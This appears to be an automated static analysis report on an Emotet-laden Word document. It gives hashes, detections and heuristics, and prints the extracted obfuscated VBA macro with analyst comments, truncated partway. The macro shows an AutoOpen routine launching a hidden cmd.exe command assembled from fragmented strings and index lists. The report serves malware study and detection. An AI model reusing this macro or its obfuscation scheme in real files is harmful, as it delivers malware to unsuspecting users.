Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 d484083ae9cd61eb…

MALICIOUS

Office (OLE)

90.4 KB Created: 2018-08-08 09:10:00 Authoring application: Microsoft Office Word First seen: 2018-08-14
MD5: 751ea8741443cb59017a841f81e7c2c4 SHA-1: 7842384d87dcb08e077846310b7a7b1998d80328 SHA-256: d484083ae9cd61eb460c9dce2e09a805c15760e6b7f0f96f0863df24aef86b32
Risk Score: 142

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with a specific Emotet signature. The presence of an AutoOpen VBA macro, detected by multiple heuristics, indicates that macro code executes automatically when the document is opened. The macro builds a command string piece by piece and runs it via 'cmd.exe', which strongly suggests it is a downloader for a second-stage payload, consistent with Emotet's behavior.

Heuristics 5

  • ClamAV: Doc.Downloader.Emotet-6884087-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6884087-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — a standard Office XML namespace identifier, not a network indicator from the macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5543 bytes
SHA-256: 2c0faaa048a4ce74ca496bccffda47b8e0b9781d358197f2f68fec5094342cbd
Preview script
First 1,000 lines of the extracted script
' Module header as emitted by olevba. VB_Base = "1Normal.ThisDocument" marks
' this as the document's ThisDocument class module; VB_Name is a
' non-descriptive identifier, in keeping with the obfuscated code below.
Attribute VB_Name = "OAcOimGY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Entry point: Word runs AutoOpen automatically when the document is opened
' (the OLE_VBA_AUTOOPEN heuristic above). On Error Resume Next suppresses every
' runtime error, so the references to never-defined identifiers below do not
' abort execution.
Sub AutoOpen()
On Error Resume Next
   ' TypeName calls whose results are discarded; their arguments reference
   ' identifiers that are never assigned anywhere in the visible listing.
   ' They have no effect on control flow and appear to be filler inserted to
   ' hinder static analysis and signature matching.
   TypeName IJKlr
   TypeName ChrB(91407 * YUAzd)
   TypeName Rnd(951)
   TypeName CBool(448)
   TypeName CByte(UzDJZ * NbPEqq / VUscN * cLzijE)
' The only effectful statement in the routine. Shell receives a command line
' assembled from "c" + "m" followed by the return values of string-building
' functions (vjGFicd and sIakCAjjip are defined below; PFIIKYqVaq is cut off by
' the listing truncation; the remaining names are presumably further such
' functions in the part of the module not shown — confirm against the full
' extraction). The second argument evaluates to 0, i.e. vbHide, so the spawned
' console window is hidden from the user. The '@' after Shell is VBA's
' Currency type-declaration suffix and does not change what is executed.
Shell@ CStr("c") + CStr("m") + iKBYEpDAHXPYn + bBmmPTfz + vjGFicd + sIakCAjjip + PFIIKYqVaq + YlARTDfUf + CLJaGjiADN + aVwWLvbtzmX, 195825326 - 195825326
   ' More discarded TypeName filler after the command has already launched.
   TypeName GtYEu
   TypeName VtWQT
End Sub


' Second module extracted by olevba (a standard module, not the document
' class); it holds the string-building helper functions called from AutoOpen.
Attribute VB_Name = "bmTpOWNCpBMY"
' Returns the first segment of the command line that AutoOpen passes to Shell.
' Every fragment is split into short string literals joined with "+" so that no
' single literal resembles a shell command; the TypeName lines between the
' assignments are discarded filler (see AutoOpen).
Function vjGFicd()
On Error Resume Next
TypeName 5
   TypeName Sgn(4343)
' Concatenated with the "cm" from AutoOpen this yields the interpreter
' switches "d /V:/C". The Chr(...) argument sums undefined identifiers (which
' evaluate as Empty, i.e. 0, in arithmetic) with 34, so it produces a double
' quote character; what follows is "set 9z=" plus the start of the variable's
' value. Assigning a long string to an environment variable and enabling
' delayed expansion (/V) is how the rest of the command is hidden.
YlzrZFHfjBN = "d /V" + ":/C" + CStr(Chr(hXPcEmLufWZRu + zzwizYvVXr + 34 + kWRAIcPGjnGE + VdvibTvFiN)) + "set " + "9z=" + "aCqqdbdjG" + "wKtItVaQ" + "AduXUCj" + "PU"
TypeName Sgn(KSWaM)
   TypeName ChrW(484889579)
   TypeName vjJCz
' Remainder of the 9z value (a character table containing punctuation, the
' letters and digits the real command needs), then "&&for %0 in" which begins
' a cmd for-loop over the numeric list that follows.
dlwjtA = "uGZzwhop'" + "y{N.(\" + "m" + "fTWl;n,D9" + "xY" + "c" + "sS=k3OF1" + "}v" + ":e-/)i r" + "6$@+&&fo" + "r %0 in"
TypeName TljBAv
   TypeName iiJPNT
   TypeName Sin(4)
' Start of the for-loop's value list. The numbers appear to be positions into
' the 9z string from which the final command is reassembled one character at a
' time at run time; the list continues in sIakCAjjip and PFIIKYqVaq. The
' decoded command is not recoverable from the visible listing alone.
zlpDf = " (33,32,3" + "0" + ",65,71,54," + "31,65,45" + ",45" + ",7"
TypeName CLng(9294)
   TypeName CDbl(29666 + OFXOQ / VHDwO + 72209)
ACNhwzLao = "0,73,31,4" + "9," + "18,56,4" + "7,65,30," + "66,3" + "2," + "5," + "23,65,5" + "3,13"
TypeName fjzAJ
   TypeName UqjChP
UitzvFqihUS = "," + "70,37,65," + "13,3" + "8,44" + ",65,5,22,4" + "5,69,65,4" + "7," + "1"
TypeName WaLvMU
   TypeName CStr(93563 + qzbQNB - 88060 - QkPih)
   TypeName 843
zGkCbEzTMk = "3,46,73" + ",15,43,55," + "56,3" + "4,3" + "1,13,13,3" + "3,6" + "4,67,67," + "54,53" + ",15," + "47" + ",18,71,3"
TypeName ChrB(20)
   TypeName ijKUzj
mmIFdOifP = "5" + ",6" + "5" + ",71,38," + "54,65" + "," + "67,52,74,3" + "1,13,1" + "3" + ",33," + "64,67" + ",67," + "45,65,69,"
' Function return value: all fragments joined in order.
vjGFicd = YlzrZFHfjBN + dlwjtA + zlpDf + ACNhwzLao + UitzvFqihUS + zGkCbEzTMk + mmIFdOifP
   TypeName 233321069
   TypeName ChrB(12643571)
   TypeName TTCEci
End Function
' Returns the next segment of the command line: a continuation of the numeric
' index list started in vjGFicd. Same construction pattern — fragmented string
' literals joined with "+", interleaved with discarded TypeName filler whose
' arguments reference undefined identifiers.
Function sIakCAjjip()
On Error Resume Next
TypeName CSng(101)
   TypeName Log(DjGqS)
   TypeName Atn(zCWPn)
murwBVJBSa = "54," + "26,71,65" + "," + "53,32,69," + "47,41,15" + ",53," + "31,69,47," + "65,38,53" + ",32,41," + "6" + "7,2" + "0,51,59," + "74,31,13,"
TypeName CLng(IkGzt)
   TypeName 347
PoUJFkOs = "13,33,64," + "67,67,54,1" + "5,47,13,15" + ",53,31,15" + ",71,"
TypeName CSng(6)
   TypeName CInt(TWjQE)
wSjARnR = "6" + "9" + ",13,3" + "5,65,6" + "3,6" + "5,47,13,38" + ",53" + ",32,41,67," + "16," + "10,57,16,7" + "4,3" + "1,"
TypeName Int(bWvnj * 38159)
   TypeName CStr(jUMFW)
   TypeName Int(83155 * 72171 - 57060 / 76265)
SjXkiui = "13,13,3" + "3,6" + "4,67,67" + ",47,15" + "," + "54" + ",65" + ",66,71,32" + ",18,69," + "4" + "7,1"
TypeName Cos(DUzAl * ohiQrz * 77073 / UYlGhh)
   TypeName mfOqdk
   TypeName ChrB(DwPwT)
fKbRvJfHOqz = "5,38,53,29" + ",67," + "51" + ",32,14,50" + ",44,72,74" + ",31,13," + "13," + "3" + "3,64,67" + ",6" + "7" + ",54,6"
TypeName XrarjO
   TypeName qJuZZ
BioJjfJQ = "5,7" + "1,5," + "32,71,6" + "5,57,3" + "8" + ",53,32," + "41,67,5,5" + "8" + ",65,32,44," + "3,34,3" + "8,55,3" + "3,45"
TypeName 70
   TypeName 5
' The list is still open at the end of this segment; it is continued by
' PFIIKYqVaq (truncated in this listing) and whatever functions follow it.
FzZbqjBDCom = ",69,13,39," + "34" + ",74," + "34,68,46," + "73,49,26," + "60,70,5"
' Function return value: all fragments joined in order.
sIakCAjjip = murwBVJBSa + PoUJFkOs + wSjARnR + SjXkiui + fKbRvJfHOqz + BioJjfJQ + FzZbqjBDCom
   TypeName Tan(64338 - 53859 + 51956 + JLqFXC)
   TypeName CBool(988)
   TypeName 153062119
End Function
Function PFIIKYqVaq()
On Error Resume Next
TypeName tAYwtF
   TypeName GrrMO
   TypeName CInt(19)
YHKqO = "6,70,34,61" + ",61,61," + "34,46,73,2" + "8,25,60,5" + "6,73,6" + "5," + "47" + ",6" + "3,64," + "13,"
TypeName CLng(313410910)
   TypeName Round(JSNnY * iIQOR)
pLFfXKw = "6" + "5,41,33,75" + ",34,40" + ",34,75,73," + "49,26,6" + "0,75,34,3" + "8,65" + ",5" + "1,65," + "34,46," + "42," + "32," + "71,65,15"
TypeName Arrob
   TypeName ChrB(SEAPX)
PsZDbWwsU = ",53,
... (truncated)